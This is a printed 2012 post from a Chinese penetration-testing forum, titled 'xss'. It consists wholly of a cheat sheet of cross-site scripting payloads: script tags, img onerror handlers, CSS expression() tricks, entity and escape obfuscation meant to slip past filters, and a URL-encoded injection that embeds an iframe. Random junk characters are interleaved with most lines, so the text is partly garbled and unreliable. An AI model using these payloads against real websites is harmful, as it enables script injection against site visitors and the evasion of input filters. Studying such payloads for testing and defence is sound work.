中国网络渗透测试联盟

标题: xss [打印本页]
作者: admin    时间: 2012-9-15 14:09
标题: xss
<script>alert("跨站")</script>    (最常用)% N" U7 R! b* h/ ?* f3 r4 c
<img scr=javascript:alert("跨站")></img>
" X: @4 }* ~4 U$ s: Y" n2 O; C5 {<img scr="javascrip&#116&#58 alert(/跨站/)></img>$ J' A4 r, z8 [: l' E  g7 z+ z
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
9 H/ L3 o- m9 R! A, I2 X<img scr="#" onerror=alert(/跨站/)></img>% L. a, J- G1 F& u4 w
<img scr="#" style="xss:expression(alert(/xss/));"></img>/ N3 y" q: f) k  a- c- z2 g  c: }
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
3 A3 H; ^- ~( R& ^: n2 ^: `<img src=vbscript:msgbox ("xss")></img>
: D' C$ |- p. `8 e<style> input {left:expression (alert('xss'))}</style>  \# u1 x- H& g0 B: {) ?
<div style={left:expression (alert('xss'))}></div>
' t; M0 ?3 S1 d, \; y<div style={left:exp/* */ression (alert('xss'))}></div>2 b  r# M# j3 [" m* @, ~* C/ k0 u
<div style={left:\0065\0078ression (alert('xss'))}></div>
+ n, d; a' s9 Hhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>! n" J+ N; ~) |
unicode <div style="{left:expRessioN (alert('xss'))}">
; I) |3 P+ d5 s1 N( @1 l: \+ n
6 h- D$ M: @# K: {"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>[": n# L# b$ S2 w6 B3 p' A




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2